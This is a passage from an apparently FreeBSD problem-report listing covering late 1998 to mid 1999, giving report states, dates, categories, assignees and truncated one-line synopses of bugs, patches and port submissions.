CAM o [1998/12/16] i386/9102 Voxware does not provide /dev/mixer for E o [1998/12/16] ports/9107 asami Addition to bsd.port.mk for searching mul o [1998/12/17] bin/9118 default install of aout compat libs is in o [1998/12/18] bin/9123 pax can't read tar archives that contain o [1998/12/20] kern/9144 luigi acd driver inconsistency (byte order in C o [1998/12/21] conf/9160 /etc/services file corruption o [1998/12/22] bin/9176 dillon placemark to split mount_ufs out of mount o [1998/12/23] kern/9183 newton chroot(2) can be broken by the superuser. o [1998/12/24] bin/9188 telnet gets stuck in ttydrain() o [1998/12/27] bin/9206 sysinstall installation should create /st f [1998/12/28] misc/9220 nvi: catalog: mistake in Russian error me o [1998/12/28] bin/9226 telnetd can log wrong IP address to utmp o [1998/12/29] bin/9233 gmp's mpq_add and mpq_sub are buggy o [1998/12/30] conf/9245 obsolete locale setting in /usr/src/etc/{ o [1998/12/30] conf/9246 allscreens_flags in /etc/rc.conf not work o [1998/12/30] bin/9250 [PATCH] allow fetch to do ftp directory l o [1998/12/31] i386/9257 fpathconf() missing from libc_r o [1998/12/31] bin/9259 allow no prompt for yes in fdformat, but o [1999/01/02] bin/9281 awk asumes memory that is returned from m o [1999/01/03] ports/9286 andreas Patch for games/nethack-qt to fix compila o [1999/01/03] ports/9289 kris New Port - ASPostit (Dockable version of o [1999/01/04] kern/9316 Intel PILA8461 NIC panics 2.2.7 during pr o [1999/01/04] bin/9318 vgrind(1): no JAVA support o [1999/01/04] i386/9319 D-Link DE-528CT poor performance o [1999/01/05] bin/9333 timestamp dump's progress o [1999/01/05] i386/9341 tty-level buffer overflows o [1999/01/06] docs/9352 hoek wrong macro names in groff_[ms|mm|mmse].7 o [1999/01/07] bin/9374 Improved functionality for find(1) o [1999/01/08] conf/9388 magic(5) correction for wordperfect o [1999/01/08] kern/9392 Alternate system clock OR kernel stats cl f [1999/01/10] ports/9425 se KDE starting up from xdm has problem.... o [1999/01/13] bin/9470 aout-to-elf-build broken with kerberosIV- o [1999/01/13] kern/9474 "comcontrol rescan 0:8:0" hangs, causes o o [1999/01/14] bin/9494 new option to prevent mail from sending m o [1999/01/16] bin/9529 ftp filname completion can't handle space o [1999/01/17] bin/9536 make world installs aout compat libs in t o [1999/01/19] bin/9569 top(1) ignores tty EOF condition. o [1999/01/19] kern/9570 ed(4) irq config enhancement o [1999/01/19] bin/9573 ksrvtgt not working o [1999/01/20] misc/9582 configApache command doesn't work for /st o [1999/01/20] kern/9590 Clean up for -Wall warnings o [1999/01/21] kern/9611 MFS calculates the size incorrectly when o [1999/01/22] kern/9619 Restarting mountd kills existing mounts a [1999/01/24] ports/9657 ports Progressive Networks' RealAudio proxy por o [1999/01/25] kern/9679 fix for uninterruptible open in portal fi o [1999/01/25] kern/9689 panic in sbdrop(kern/uipc_socket2.c) o [1999/01/26] bin/9711 Fails: cd /usr/bin; gzip file ; mv file. o [1999/01/27] i386/9721 Patch for FreeBSD netboot (booting via DO o [1999/01/28] kern/9748 error in queue handling of at_shutdown() o [1999/01/28] kern/9764 allow /bin/df not to list certain entries o [1999/01/28] bin/9770 An openpty(3) auxiliary program o [1999/01/29] i386/9777 luigi Generic AD1816 sound suport in Luigi's pc o [1999/01/29] misc/9778 Need to handle conflicting pthread.h and o [1999/01/29] ports/9786 cwt tk80 port doesn't create man page links o [1999/01/30] kern/9791 enhancement for netinet/ip_icmp.c to cont o [1999/01/30] ports/9792 msmith pib coredumps in port maker mode o [1999/01/30] ports/9795 obrien The Handbook is not clear on how to deal o [1999/01/30] bin/9809 finger output format wrong f [1999/01/30] ports/9811 nectar New port: lang/gnomeguile o [1999/01/30] ports/9812 nectar New port: devel/libgtopbindings o [1999/01/31] ports/9840 asami patch allows ports to fetch their sources o [1999/01/31] conf/9845 Propose adding options to rc.conf and rc. o [1999/01/31] kern/9848 ARP proxyall extra sanity check o [1999/02/01] bin/9868 Patch to add "date -a" o [1999/02/01] kern/9869 When using macros out of function, they s o [1999/02/01] conf/9874 idle-timeout facilities in /etc/login.con o [1999/02/03] bin/9893 NFS umount of regular file impossible o [1999/02/03] bin/9902 error in german (and some other) locale s o [1999/02/05] ports/9921 peter exmh2 ports update o [1999/02/06] bin/9931 config gives misleading error when duplic o [1999/02/07] ports/9954 ports new port devel/ACE o [1999/02/08] bin/9972 groff always built for US (letter) sized o [1999/02/09] gnu/9987 jdp wrong (for FreeBSD) ELF_DYNAMIC_INTERPRET o [1999/02/09] bin/9990 Enhancement to filename completeion in cs o [1999/02/09] i386/9991 new driver for National Instruments GPIB o [1999/02/09] ports/9993 kris New Port - graphics/libunfig o [1999/02/09] ports/9998 kris New port - graphics/mtv (MpegTV player) o [1999/02/10] i386/10004 jkh instalation of current version from FTP s o [1999/02/10] ports/10007ports Port of the mercury compiler version 0.8 o [1999/02/11] ports/10023kris New port - net/gtkcookie o [1999/02/11] bin/10030 markm Kerberized telnet fails to encrypt when a o [1999/02/12] i386/10052 Matrox Millennium II AGP device/model id o [1999/02/14] docs/10085 doc NIS Setup Tutorial o [1999/02/14] kern/10095 missing VGA description o [1999/02/14] docs/10098 doc Lack of overall guide for NIS setup o [1999/02/15] gnu/10112 /usr/src/gnu/usr.bin/patch sorely out of o [1999/02/16] kern/10116 acd driver patch to support PD/CD drive. o [1999/02/16] ports/10124ports UNIX|STAT pr submission failed to include f [1999/02/17] bin/10131 n_hibma bug in strptime(3) o [1999/02/18] docs/10146 jkh Release Notes and LINT for 3.1 include ha o [1999/02/18] kern/10149 New PCI device o [1999/02/19] bin/10158 Reference to ncheck in quot(8) o [1999/02/19] kern/10159 Unable to unload vinum module o [1999/02/19] kern/10160 kldload of umap module panics the system o [1999/02/19] ports/10162se Fix kdmrc to add qmail usernames to NoUse o [1999/02/19] misc/10167 Upon exiting X11R6, monitor goes blank. o [1999/02/20] bin/10169 find -perm doesn't allow a bitwise o [1999/02/20] kern/10175 Bridging support incomplete for some netc o [1999/02/21] ports/10178torstenb USE_SOCKS=YES option broken for security/ o [1999/02/22] ports/10196torstenb Better startup scripts for ssh o [1999/02/22] ports/10215rvb net/coda_client and net/coda_server o [1999/02/23] ports/10227peter wrong sendmail path in rdist6-port s [1999/02/23] misc/10231 inet_addr() doesn't check for illegal val o [1999/02/25] docs/10240 doc We need a script which check if our web m o [1999/02/25] conf/10244 100 character limit on any pathname in sy o [1999/02/25] kern/10255 Some more SiS chipset PCI IDs for chipset o [1999/02/26] bin/10274 make does not understand "lib(obj)" synta o [1999/02/26] bin/10283 Race condition in rc.network o [1999/02/28] bin/10300 dmesg exits on signal 10 o [1999/03/01] misc/10325 Implementation of itoa() for libc o [1999/03/01] bin/10342 putenv(3) unnecessarily calls strdup/free o [1999/03/01] misc/10349 For long .Dt fields, rendering is broken- o [1999/03/02] misc/10351 /usr/share/examples/worm is out of date o [1999/03/02] bin/10358 ftp(1) has problems with long pathnames o [1999/03/05] ports/10396asami SPIN is in the wrong category o [1999/03/06] kern/10440 Discard device does not set ifq_maxlen o [1999/03/06] bin/10444 avoiding lost mail when mail filesystem i o [1999/03/06] ports/10454obrien Update: emulators/spim a [1999/03/06] kern/10455 pcaudio breakage o [1999/03/07] i386/10465 Must disable ex0 to install. o [1999/03/07] ports/10477ports The fakemail in lib-src fails to link (ne o [1999/03/08] bin/10493 ipfw's undocumented feature s [1999/03/09] bin/10508 obrien isc-dhcp puts garbage to text options, V2 o [1999/03/10] bin/10522 make world died due -Werror o [1999/03/10] bin/10524 3.1-19990309-STABLE install problem o [1999/03/10] ports/10532ports Port of GNU Pascal o [1999/03/10] bin/10538 sbin/nos-tun gives wrong usage message o [1999/03/11] bin/10546 Intel Pro/100 PC card has CIS string > CI o [1999/03/11] bin/10548 More useful default ifconfig behaviour sa o [1999/03/12] gnu/10555 jraynard [PATCH] awk dumps core o [1999/03/12] kern/10563 QIC 40/80 tape drive ft present in versio o [1999/03/13] bin/10568 obrien dhcp client receives garbage (dhclient pr o [1999/03/13] kern/10574 3.1-stable kernel reports k6 cpu as "\^E" o [1999/03/14] conf/10582 Makefile.upgrade fails with make -j o [1999/03/14] misc/10589 Incorrect assumptions in /etc/security o [1999/03/14] bin/10590 new option to silince confirmation but no o [1999/03/15] bin/10601 wosch Ownership of symlinks copied by adduser a o [1999/03/15] i386/10606 Probablue odd error message if LS-120 is o [1999/03/15] i386/10608 add Opti Viper-M PCI ID o [1999/03/15] kern/10609 adjtime bug (tv_sec > 2147) and enhanceme o [1999/03/15] bin/10610 New options to date to slowly adjust time o [1999/03/15] bin/10611 timed enhancement o [1999/03/16] bin/10622 vi does not display Russian characters pr o [1999/03/16] i386/10623 DFLTPHYS in /usr/src/sys/i386/include/par o [1999/03/16] ports/10634ports Update the hylafax port to do a client in o [1999/03/17] ports/10639rse ports/web/wml must be upgraded and unbrok o [1999/03/17] kern/10641 Default sync rate in ncr SCSI driver is s o [1999/03/17] kern/10642 exports(5) mentions KERBNFS but that's no o [1999/03/18] bin/10657 Unable to install from CDROM or DOS parti o [1999/03/18] kern/10663 hpscan doesn't like 3.1's pt device o [1999/03/18] docs/10664 doc Notes on 2.2.8 -> 3.1 migration o [1999/03/18] misc/10667 Sysinstall inserts multiple # -- sysinsta o [1999/03/19] gnu/10670 cvs doesn't allow digits in local keyword o [1999/03/19] kern/10673 Non-ASCII chars on serial console with Re o [1999/03/19] kern/10678 Printing problems using ppc bus o [1999/03/19] ports/10682asami List mirror sites in MASTER_SITE_BACKUP - o [1999/03/22] kern/10728 sos WCD driver does not recognize a recovered o [1999/03/22] ports/10734pst Update of gdb port to 4.17 o [1999/03/23] kern/10755 de driver says `invalid EESPROM checksum' o [1999/03/23] i386/10766 obsolete device name wcd is still left un o [1999/03/24] i386/10779 zp slot 0 sees 3Com 589 PCMCIA card but z o [1999/03/25] bin/10793 cvs update modification time check granul o [1999/03/26] misc/10803 whois(1) client enchancements a [1999/03/26] misc/10804 billf whois(1) enhancement o [1999/03/26] ports/10806phk Update net/scotty to 2.1.10 o [1999/03/26] kern/10812 LINT configuration MAXDSIZ/DFLDSIZ mislea o [1999/03/26] ports/10813ports crossgo32 brokeness o [1999/03/27] bin/10825 daily script not executed or executed twi o [1999/03/28] docs/10840 jkh [PATCH] Add pcic double-loading bug fix t f [1999/03/28] ports/10844ports New port: adagdb o [1999/03/29] docs/10850 doc submitting a documentation change for sed o [1999/03/29] bin/10856 vty's from ttyvc - ttvf (maybe more?) do o [1999/03/30] bin/10868 BUG in /usr/bin/calendar o [1999/03/30] misc/10871 wst0 fails with Sony SuperStation streami o [1999/03/30] bin/10878 host(1) dumps core o [1999/03/31] kern/10894 wrong error message in svctcp_create() o [1999/04/01] bin/10905 sa(8) is hard coded for 8 character user o [1999/04/01] gnu/10910 Integration of Objective C patches into g o [1999/04/02] ports/10916ports new port biology/molmol again f [1999/04/02] bin/10921 green I wished from(1) would count the number o o [1999/04/02] bin/10923 /usr/bin/cpp is an out-of-date wrapper fo o [1999/04/02] bin/10924 Extensions to biff(1) o [1999/04/03] bin/10931 biff b o [1999/04/04] ports/10945jmz X11 "sessreg" program does not update /va o [1999/04/06] bin/10980 With ctags -x no space is left between na o [1999/04/06] bin/10992 pthread_kill() doesn't deliver signals to o [1999/04/07] docs/10997 doc Problem with query-pr-summary.cgi o [1999/04/07] i386/11006 Sysinstall silently makes FreeBSD's parti o [1999/04/08] kern/11020 popen does not honor ISO 9899 syntax o [1999/04/08] ports/11029ports Configure scripts for non ported applicat o [1999/04/08] bin/11031 [PATCH] mount and umount support for mort o [1999/04/08] bin/11032 h2ph's cpp #warning/#error directive proc o [1999/04/08] ports/11034ports New ports of crazywwwboardle o [1999/04/08] bin/11036 markm Perl does not honor -DNOMAN o [1999/04/08] bin/11037 Gencat doesn't properly handle \ddd octal o [1999/04/09] ports/11048obrien variable not initialized in fwtk-lib lead o [1999/04/09] bin/11051 ps's -U option should accept a list of us o [1999/04/09] misc/11052 [PATCH] performance bug fix to fgets() ro o [1999/04/10] conf/11058 Recent change to rc script causes hang on o [1999/04/11] bin/11085 Per-host configuration for syslog.conf o [1999/04/11] bin/11092 readlink(1) from OpenBSD o [1999/04/11] bin/11094 lastlogin.8 from NetBSD o [1999/04/12] kern/11109 ipfw.ko Makefile contains CFLAGS+= -DDIVE o [1999/04/13] misc/11111 Error opening terminal: su o [1999/04/13] bin/11114 make(1) does not work as documented with f [1999/04/13] bin/11121 green w(1) cannot handle more than one user on o [1999/04/13] misc/11126 vt100 termcap entry appears broken o [1999/04/14] ports/11134hoek existense of /usr/obj/usr/ports/shells/ba o [1999/04/14] ports/11138jmz New version of Xevil 2.01, I created a po o [1999/04/14] bin/11141 u_long is not big enough o [1999/04/15] misc/11149 Web page entry for BAFUG is incorrect o [1999/04/16] i386/11165 IBCS2 don't work correctly with PID_MAX 9 o [1999/04/16] bin/11168 pw(8) usermod does not recognize -w flag o [1999/04/16] kern/11178 [PATCH] minor fix to /usr/include/sys/mbu o [1999/04/18] i386/11201 brian mktime possible bug o [1999/04/18] bin/11205 Suggestion: move mt(1) to /bin o [1999/04/18] i386/11207 sys/i386/isa/rp.c: fixed breaking and war o [1999/04/19] kern/11222 MFS does not sync from reboot syscall o [1999/04/20] kern/11235 Need to submit new driver o [1999/04/20] bin/11236 mountd fails to properly check for kernel o [1999/04/20] conf/11243 mountd startup can lose flags o [1999/04/20] bin/11248 Shuffle o [1999/04/21] docs/11258 doc suggestion to refine npx.4 o [1999/04/22] kern/11287 rfork(RFMEM...) doesn't share LDTs set by o [1999/04/22] misc/11289 makeflp.bat suggestion: create "kernel" d o [1999/04/23] kern/11293 brian FreeBSD's PPP implementation of LQM appea o [1999/04/23] bin/11294 direct logging to other hosts (no local s o [1999/04/25] misc/11316 [PATCH] HTTP proxy support for sysinstall o [1999/04/27] ports/11353asami Feature additions to bsd.port.mk. o [1999/04/27] ports/11354jmz Port fix: x11/XFree86 o [1999/04/27] bin/11360 Allow specification of "search" in resolv o [1999/04/28] kern/11365 plip in Linux mode has trouble with some o [1999/04/28] bin/11370 more segfaults if you give it a real file o [1999/04/28] misc/11373 errata.txt for 3.1 o [1999/04/29] misc/11383 $Id$ missing in some files in etc [PATCH] o [1999/04/29] bin/11387 mount_cd9660 doesn't show rockridge filen o [1999/04/29] ports/11388torstenb patch for ircII so /window create works o [1999/04/29] bin/11399 Calendar doesn't always handle 'last' day o [1999/04/30] kern/11410 code typo in ad1848.c: the != operator ha o [1999/04/30] kern/11411 code typo in clones.c: "if ((mpu_config = o [1999/04/30] kern/11412 code typo in ip_fil.c: missing NULL check o [1999/04/30] kern/11413 code typo in pci.c: the != operator has h o [1999/04/30] kern/11414 code typo in pcf.c: the != operator has h o [1999/04/30] kern/11415 code typo in wst.c: the != operator has h o [1999/04/30] kern/11416 code typo in sequencer.c: "if (!processed o [1999/04/30] ports/11421jfitz upgrade p5-Date-Manip 5.33 -> 5.34 o [1999/05/01] ports/11430se incorrect int type causes floating point o [1999/05/02] misc/11448 Better looking VGA font for iso2 o [1999/05/02] ports/11460erich Update to the xlispstat port o [1999/05/03] misc/11478 Non-functional AFS support in KerberosIV o [1999/05/04] ports/11504chuckr Update ports math/octave o [1999/05/05] ports/11510nik new version of www/sitecopy (0.6.0) o [1999/05/05] kern/11516 NetGear 10/100 Ethernet 21140-based Ether o [1999/05/05] kern/11517 ../../kern/kern_ntptime.c:533: warning: i o [1999/05/05] kern/11518 ../../pci/if_tx.c:1376: warning: no previ o [1999/05/05] kern/11519 dead code in ncr driver o [1999/05/06] bin/11552 sendmail local delivery (mail.local) can' o [1999/05/06] misc/11553 /usr/share/misc/latin1 (new file submissi o [1999/05/07] misc/11569 Automatically run fsck when the file syst o [1999/05/09] bin/11608 vnconfig not supporting swap-backed vn de o [1999/05/09] bin/11609 vnconfig -v reports page numbers, not byt s [1999/05/09] ports/11611billf Update port: net/ntop o [1999/05/10] bin/11623 quot uses 32-bit integers for its calcula o [1999/05/10] conf/11626 /var/log/kerberos is rotated o [1999/05/10] bin/11637 build of kdump fails o [1999/05/11] ports/11652ports New port (net/dictd) o [1999/05/11] misc/11653 obrien patch to allow DHCP configuration of inte o [1999/05/12] bin/11669 gcc 2.7.2.1 gets bad magic error linking o [1999/05/12] bin/11671 "vidfont -r" fails, asking for font size o [1999/05/12] i386/11674 can't do make imake build or anything sin o [1999/05/12] kern/11676 PCIless kernel will not compile with ATAP o [1999/05/13] i386/11683 olpt/nlpt name change not in man pages o [1999/05/13] misc/11689 Change "netstat" mode in daily "status-ne o [1999/05/17] ports/11743torstenb inn-2.2 (nonfatal) premature stop of buil o [1999/05/17] bin/11746 Add support for Solaris mailboxes o [1999/05/18] kern/11765 performance bug: network devices fxp & de o [1999/05/18] misc/11767 sppp does not implement VJ compression o [1999/05/19] ports/11786kuriyama gnupg-0.9.6 port does not install o [1999/05/19] misc/11788 booting problems o [1999/05/19] kern/11789 ELF machine definition missing for ARM o [1999/05/20] misc/11812 ftp5.freebsd.org can't find giflib-3.0 an o [1999/05/21] bin/11818 Added a feature to ping(8) o [1999/05/21] ports/11820asami bsd.port.subdir.mk does not define the `m o [1999/05/21] i386/11829 Boot Failure (Register Dump) with MFSroot o [1999/05/22] misc/11838 xwindows configuration problem o [1999/05/22] ports/11840asami Feature fixup: bsd.port.mk o [1999/05/24] ports/11879ports dclock's "-miltime" option and "*miltime" o [1999/05/24] kern/11881 when a dummynet pipe is encountered it st o [1999/05/25] misc/11890 make world creates /lkm directory o [1999/05/26] bin/11896 cap_mkdb dumps core when non-files passe o [1999/05/26] i386/11898 Connot wirte to floppy on HP OB800CT with o [1999/05/26] bin/11900 Sed(1) fails with MALLOC_OPTIONS set to ' o [1999/05/27] conf/11905 sysinstall desktop changing inconvenience o [1999/05/28] bin/11914 makewhatis during installworld uses /usr/ o [1999/05/28] i386/11920 FBSD 3.2 upgrade claims not to upgrade /u o [1999/05/28] i386/11921 /usr/X11R6/lib/aout libraries screwed up o [1999/05/29] conf/11925 rc.conf cosmetic naming inconsistencies o [1999/05/29] bin/11929 symorder doesn't work on elf format objec o [1999/05/29] kern/11941 FreeBSD box reboots itself when changing o [1999/05/30] kern/11945 tape problems on -stable, mt bl(ocksize), o [1999/05/31] ports/11963ports should update the ocaml-tk module and ins o [1999/05/31] ports/11964jmacd lang/STk port needs to be updated to STk- o [1999/05/31] kern/11968 kldload should call module entry point be o [1999/06/01] docs/11978 doc timed(8) manpage does not define '-F' swi o [1999/06/01] i386/11979 Vaio 505DX touchpad not detected as Glide o [1999/06/01] kern/11981 brian access to tunN devices not allowed to non o [1999/06/01] kern/11982 Three cleanup fixes for uthreads o [1999/06/02] conf/11989 pppd(8) output misplaced o [1999/06/02] bin/11997 Enhancement for lpr o [1999/06/02] ports/12001ports wmcdplay 1.0Beta1 05/09/1998 sometimes sk o [1999/06/03] misc/12013 patch for 12012 o [1999/06/03] kern/12014 Fix SysV Semaphore handling o [1999/06/04] conf/12026 /etc/rc.diskless1 refrences non-existant o [1999/06/05] misc/12044 having tcl.h in /usr/local/include:/usr/i o [1999/06/06] gnu/12046 markm Perl subsystem does not install all tutor a [1999/06/06] bin/12052 sh type builtin appends first path compon o [1999/06/06] kern/12053 fixes a few aio bugs, makes socket io bet o [1999/06/06] ports/12056ache [PATCH] hpack install files always in /us o [1999/06/06] ports/12057markm Perl5 library builds do not honour PREFIX o [1999/06/07] kern/12071 [PATCH] large scale IP aliasing o [1999/06/08] i386/12088 Enhancement to ed driver for Linksys 10/1 o [1999/06/09] kern/12095 [PATCH] Buggy ATAPI Zip Drive is not dete o [1999/06/09] bin/12107 Add switch to dump to support multiple du o [1999/06/10] i386/12113 ESS1688 support for VoxWare sound driver o [1999/06/10] bin/12115 pppd reports wrong connected duration wit o [1999/06/13] ports/12188ports new port: pbs-2.1.11 (misc/PBS) a batch s o [1999/06/13] ports/12195ports submission of new port pgpenvelope o [1999/06/14] ports/12204andy Update port: graphics/EZWGL o [1999/06/14] misc/12209 termcap: "xterm" entry defines bogus capa o [1999/06/15] misc/12228 /etc/security don't search in all the fil o [1999/06/15] bin/12232 Dangling text on #endif causes cpp noise. o [1999/06/16] gnu/12238 bc 1.04 crashes with long formula typed i o [1999/06/16] kern/12241 jkh Req: GENERIC includes bpf device o [1999/06/16] bin/12244 realpath() fails when there is no permiss o [1999/06/17] bin/12255 BIND 8.1.2 compilation error in IPv6 capa o [1999/06/17] bin/12263 hoek "more" problems with long filenames f [1999/06/17] misc/12268 n_hibma weekly/catman will not work o [1999/06/18] ports/12271ports fix pkg_add with error message and add ne o [1999/06/18] bin/12280 jdp LD_IGNORE_MISSING_OBJECTS not honored for o [1999/06/18] kern/12281 active-filter option in pppd doesn't stop o [1999/06/20] bin/12308 LPD can't be told not to bind to a TCP po o [1999/06/21] conf/12324 jkh Sysinstall's fdisk partition editor is mi o [1999/06/21] ports/12325asami Adds refetch functionallity to bsd.port.m o [1999/06/21] i386/12326 wdc flag 0x1000 (LBA addressing) prevents o [1999/06/21] kern/12333 ProAudio Spectrum sound card broken model o [1999/06/21] kern/12334 Some ProAudio SPectrum cards do not do DM o [1999/06/21] kern/12335 if_pn.c lacks bridging support; patch enc o [1999/06/22] conf/12342 /etc/hosts.allow must use numerical IP ad o [1999/06/22] bin/12357 [PATCH] allow route to create "proxy only o [1999/06/23] bin/12358 ken Patch: "camcontrol help" should go to std o [1999/06/23] ports/12366billf finish the port for misc/mprime o [1999/06/23] ports/12368ports Pilot-link installs to ${PREFIX} = ${LOCA o [1999/06/23] bin/12375 mv(1) cannot inherit the file flags. o [1999/06/24] i386/12383 make release warns about /dev entries mak o [1999/06/26] bin/12398 fsck in free(): warning: pointer to wrong o [1999/06/26] ports/12403ports ssh port has undocumented X11 dependency f [1999/06/26] ports/12406ports New port for the LAM implementation of th o [1999/06/27] kern/12409 add some more chipset models by NVidia to o [1999/06/27] bin/12421 sysinstall label fails o [1999/06/28] conf/12432 empty amd_flags causes start failure in r o [1999/06/29] ports/12456chuckr graphics/xpdf: small fixes o [1999/06/30] bin/12461 it's handy to be able to send syslog mess o [1999/06/30] bin/12467 wollman ac(8) does not accept input from stdin o [1999/07/01] kern/12475 ctrl,shift,alt keys can be used as alock o [1999/07/01] bin/12477 New fortune o [1999/07/02] docs/12486 mpp listing of (56) utilities in /bin:/sbin:/ o [1999/07/02] bin/12489 /sbin/route exits with 0 on some errors o [1999/07/02] ports/12490ports package xmine exits 1 with XawAsciiSource o [1999/07/02] ports/12492ports port misc/diction should be moved to text o [1999/07/03] kern/12495 3.1 install fails to detect Toshiba CDROM o [1999/07/03] ports/12503ports New Port: Willows toolkit (developers rel o [1999/07/04] ports/12515jfitz p5-Apache/scripts/install_httpd needs fix o [1999/07/05] ports/12518ports new port: ifmail-os-2.14.7 o [1999/07/05] ports/12522ports New port: cos o [1999/07/05] ports/12523ports New port: jdbcpool o [1999/07/05] bin/12528 [PATCH] tip's "tipout" child doesn't alwa o [1999/07/06] ports/12530peter squid22 port with --enable-ipf-transparen o [1999/07/06] ports/12536ports New port: lang/cu-prolog o [1999/07/06] kern/12543 [PATCH] cumulative error counters for fxp o [1999/07/07] bin/12545 kldload(8) should be more sensitive to er o [1999/07/07] ports/12548asami New 'fecth-recursive(-list)' targets in p o [1999/07/07] ports/12549ports imap-uw port doesn't use pw_expire to che o [1999/07/09] ports/12571ports Xfig port doesn't have Ghostscript suppor o [1999/07/11] kern/12594 wollman wrong sysctl descriptions f [1999/07/11] ports/12596torstenb pidentd is unstable in 3.2 and 4.0 o [1999/07/11] ports/12604peter New port version: transproxy 1.0 o [1999/07/12] kern/12609 At boottime NFS mounts on a 3.2 client fr s [1999/07/12] bin/12611 sheldonh /usr/bin/jot crashes with floating point o [1999/07/12] misc/12612 ncurses ash shipped with 3.2-R missing sy o [1999/07/12] ports/12618ache poor trouble reporting by qpopper's pop_i o [1999/07/13] ports/12624ports New version of mxv which also works with o [1999/07/13] misc/12633 CMI8330 chip based integrated sound card o [1999/07/15] ports/12654pst gnats port failes on "make install" o [1999/07/15] kern/12655 Kernel config file needs more commenting o [1999/07/15] ports/12656ports new port - gnujsp o [1999/07/16] ports/12661cpiazza new port: riva-glx (3d hardware accelerat o [1999/07/16] ports/12666andy New port: kcd-4.7.10 o [1999/07/16] kern/12668 The kernel clock goes slow with PLIP devi o [1999/07/16] ports/12674nik textproc/docproj port has an invalid depe o [1999/07/16] ports/12675chuckr [PATCH] textproc/sp port installs config. o [1999/07/18] kern/12697 Out of swap handling [PATCH] o [1999/07/18] ports/12699ports new port: gnofin-0.5.10 o [1999/07/18] ports/12700jmz Errors in mtools.conf file o [1999/07/20] bin/12712 release/Makefile: mounting /some/dir with o [1999/07/20] ports/12721brian Leafnode 1.9.4 has enhancements and bug f o [1999/07/20] ports/12722ports new port: AT&T's DjVu library for scanned o [1999/07/20] kern/12723 Unnecessary use of magic numbers in F_[SG o [1999/07/20] ports/12725ache Doing a 'make install' for bash2 gets ins o [1999/07/20] ports/12726jfitz p5-Pg fixed o [1999/07/21] ports/12735ports New ports: lang/ghc o [1999/07/21] ports/12737jfitz regex for checking load avergaes is wrong o [1999/07/21] ports/12739ports port for the AT&T's DjVu Netscape plug-in o [1999/07/22] ports/12761wosch sysutils/stat doesn't terminate buffer an o [1999/07/22] kern/12764 luigi Patch for using x11amp with voxware (stol o [1999/07/22] misc/12765 cable problem: link down for de0 NICs. o [1999/07/22] bin/12767 doc Expand /etc/ttys manpage o [1999/07/22] bin/12768 billf Compilation warning for fortune.c o [1999/07/22] kern/12770 mount_msdos causes panic: kmem_malloc(134 o [1999/07/23] misc/12776 Add PAM hooks to rlogind and rshd f [1999/07/23] bin/12782 sheldonh xntpd doesn't handle interface aliases pr o [1999/07/24] ports/12787obrien port of GNU helloworld o [1999/07/24] bin/12789 Confusing error msg when dumping a filesy o [1999/07/24] ports/12790kris Update Port: maildrop s [1999/07/25] bin/12801 sheldonh nvi infinite recursion with options "left o [1999/07/25] kern/12803 obrien patch to make xe driver's noise configura o [1999/07/25] bin/12806 `sh -e' doesn't parse multi-command lines o [1999/07/26] ports/12817kris gdict fix for conflict with dict port o [1999/07/27] kern/12833 Support for TI1225 PCI to CardBus Bridge o [1999/07/27] ports/12835andy New port: libcgic-1.06 o [1999/07/27] ports/12836jfitz p5-Apache port mod_perl part is out of da o [1999/07/28] ports/12851jmz XFree86 needs change for pc98 o [1999/07/28] kern/12855 panic:softdep_flushfiles:looping, caused o [1999/07/28] ports/12864ache update: less-340 a [1999/07/28] bin/12866 sheldonh [PATCH] RFE for /bin/ls to add a -n optio o [1999/07/30] misc/12887 Problem with "top" command in SMP o [1999/07/30] misc/12888 strange kernel messages when copying file o [1999/07/30] ports/12890obrien nmap seems to break under certain conditi o [1999/07/30] ports/12891torstenb Please update converters/recode to 3.5 o [1999/07/31] kern/12896 Incorrect CPU model display at boot time o [1999/07/31] bin/12898 Added a command-line switch to netstat to o [1999/07/31] ports/12899ports New port: wmnet-new o [1999/07/31] ports/12903ports new ports/database/p5-* o [1999/07/31] ports/12904taoka new ports/devel/gperf o [1999/08/01] ports/12915ports Add elm 2.5 to ports o [1999/08/01] ports/12916wosch Update Checkbot to 1.56 o [1999/08/02] docs/12933 n_hibma sio.4 misses description of 0x0080 flag o [1999/08/02] ports/12934ache procmail 3.13 port doesn't have "install- o [1999/08/03] bin/12939 add flag to quota to suppress NFS quota c o [1999/08/03] ports/12941ports New port: Hyperlatex (print/hyperlatex) o [1999/08/03] bin/12942 m4: len(`') returns `' a [1999/08/03] kern/12943 dg fxp driver not completely compatible with o [1999/08/03] bin/12946 top(1) gives incorrect delay default o [1999/08/04] docs/12951 doc missing link to japanese mailing list gui o [1999/08/04] ports/12952asami make _PORT_USE touch cookies by variable, o [1999/08/04] ports/12953ejc tcl81-thread breaks package naming conven o [1999/08/04] bin/12957 rpc.rusersd dumps core with signal 11 whe o [1999/08/04] bin/12960 des basename(3) and dirname(3) o [1999/08/04] bin/12962 des basename(3) and dirname(3) part 2 o [1999/08/04] kern/12966 receiver lockups in vr0 driver o [1999/08/04] docs/12969 doc Informacion incorrecta para versiones Fre o [1999/08/05] bin/12982 last does not support -y option. o [1999/08/05] misc/12983 system hang accessing mounted msdos flopp o [1999/08/05] misc/12992 sector size independent patch for msdosfs o [1999/08/05] i386/12993 gibbs "ahc0: Data Parity Error Detected during o [1999/08/05] docs/12994 hoek Update to getopt.3 to agree with style.9 o [1999/08/06] bin/13000 vi core dumped o [1999/08/06] ports/13006erich update emulators/x48 to 0.4.1d o [1999/08/07] ports/13012kris update port: xwhois-0.3.6 to 0.3.7 o [1999/08/07] conf/13016 Wrong sendmail.cf file used by mergemaste o [1999/08/07] docs/13020 mpp Manpage capitalization o [1999/08/08] docs/13034 doc incorrect (old/obsolete) manpage for name o [1999/08/08] misc/13036 de doesn't work with DEC 21143 based PCI o [1999/08/09] bin/13042 make doesn't handle wildcards in subdirec o [1999/08/09] bin/13043 minigzip -c option support. o [1999/08/09] i386/13051 after installation on system using COM1, o [1999/08/10] kern/13062 lnc ethernet xmit underflow problem o [1999/08/10] ports/13065marcel emulators/linux_base has wrong timezone o [1999/08/11] bin/13068 billf Don't stamp out score files! o [1999/08/11] bin/13070 sheldonh line(1) as required by Unix 98 o [1999/08/11] bin/13071 sheldonh link(1) as required by Unix 98 o [1999/08/11] bin/13072 billf Extensions to biff(1) o [1999/08/11] bin/13073 billf Extensions to mesg(1) o [1999/08/11] bin/13074 sheldonh unlink(1) as required by Unix 98 o [1999/08/11] docs/13079 mpp new man page describing timeradd() family o [1999/08/11] kern/13082 dfr Improved support for NE2000 PnP cards o [1999/08/11] ports/13085ports new port: p5-SQL-Statement o [1999/08/11] misc/13089 sysinstall repeatedly installs a distribu a [1999/08/12] bin/13091 sheldonh [PATCH] pdksh-derived replacement for tes o [1999/08/12] 